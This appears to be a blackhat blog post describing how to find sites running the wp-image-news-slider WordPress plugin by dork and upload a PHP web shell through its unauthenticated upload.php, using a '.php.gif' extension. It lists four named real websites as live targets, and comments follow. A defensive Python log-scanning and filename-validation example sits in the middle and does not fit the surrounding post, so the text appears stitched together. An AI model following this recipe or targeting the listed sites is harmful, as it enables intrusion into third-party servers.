Dork: inurl:wp-content/plugins/wp-image-news-slider
Upload.php: wp-image-news-slider/js/swfupload/js/upload.php
First run the dork above, pick a target, then open upload.php
Vuln: "No upload found in $_FILES for Filedata"
CSRF Online: Click Here
URL: http://site.com/[path]/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
POST File: Filedata
Upload shell ext: .php.gif
shell location: /wp-content/uploads/random_name.php.gif
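From a defender's side, the two observable artifacts in the write-up above are requests to the plugin's unauthenticated upload.php endpoint and files with a stacked extension (".php.gif") landing in wp-content/uploads. The following Python is an added example, not code from the page or from the plugin: it parses constructed Common Log Format lines to flag hits on that endpoint, and it implements the filename validation that the vulnerable handler lacks, rejecting any executable extension anywhere in the suffix chain rather than only checking the last one. The log lines, IP addresses and file names are constructed; the IMAGE_EXTS and EXEC_EXTS sets are assumptions for the example.

```python
import re
from pathlib import PurePosixPath

# Path of the vulnerable endpoint as given in the write-up.
UPLOAD_PATH = "/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php"

# Assumed allow-list for an image slider upload handler, and the server-side
# script extensions that must never appear anywhere in an uploaded name.
IMAGE_EXTS = {"gif", "jpg", "jpeg", "png"}
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Common Log Format: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed sample access log: a probe, an upload attempt, a normal image
# fetch, and a later request for a stacked-extension file in uploads.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php HTTP/1.1" 200 45
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "POST /wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php HTTP/1.1" 200 612
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-content/uploads/2023/10/photo.jpg HTTP/1.1" 200 30211
203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "GET /wp-content/uploads/a8f3.php.gif?c=1 HTTP/1.1" 200 1043
"""


def parse_log_line(line):
    """Return the fields of one CLF line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    # Drop any query string so path comparisons are exact.
    fields["path"] = fields["path"].split("?", 1)[0]
    return fields


def find_upload_attempts(lines):
    """(ip, method, status) for every request to the SWFUpload endpoint.

    A GET is the fingerprint probe (it returns the '$_FILES' error string);
    a POST is an actual upload attempt and deserves the higher severity.
    """
    hits = []
    for line in lines:
        f = parse_log_line(line)
        if f and f["path"].endswith(UPLOAD_PATH):
            hits.append((f["ip"], f["method"], f["status"]))
    return hits


def is_safe_upload_name(filename):
    """Validation the vulnerable handler should have done on the Filedata name.

    Every suffix in the chain is checked, so 'x.php.gif' is rejected even
    though its final extension is an image type. Case is normalised so
    'x.PHP' cannot slip through either.
    """
    suffixes = [s.lstrip(".").lower() for s in PurePosixPath(filename).suffixes]
    if not suffixes:
        return False
    if any(s in EXEC_EXTS for s in suffixes):
        return False
    return suffixes[-1] in IMAGE_EXTS


def suspicious_upload_requests(lines):
    """Paths under /wp-content/uploads/ whose name fails the extension check."""
    flagged = []
    for line in lines:
        f = parse_log_line(line)
        if not f or not f["path"].startswith("/wp-content/uploads/"):
            continue
        if not is_safe_upload_name(PurePosixPath(f["path"]).name):
            flagged.append(f["path"])
    return flagged


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for ip, method, status in find_upload_attempts(lines):
        print(f"upload endpoint hit: {ip} {method} -> {status}")
    for path in suspicious_upload_requests(lines):
        print(f"stacked/executable extension served from uploads: {path}")
```

Running it on the constructed log reports the GET probe and the POST from the same address, and flags the request for a8f3.php.gif. On a real host the same two functions would be fed the live access log, and the suffix check is the piece to add to any upload handler that currently trusts the last extension (or the client-supplied MIME type) alone.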
Live Target/Demo:
http://www.bittemilano.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://wfcj.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://namastefarms.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://tclecateau.free.fr/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
The site is being redeveloped, eh
idiot-blackhat.cf
I found a hole
I'm the developer, where is the hole?
Can I have the old web script?
I'll tell you which vuln later
Just email idiotblackhat@gmail.com
This comment has been removed by a blog administrator.
Who r u?
This comment has been removed by a blog administrator.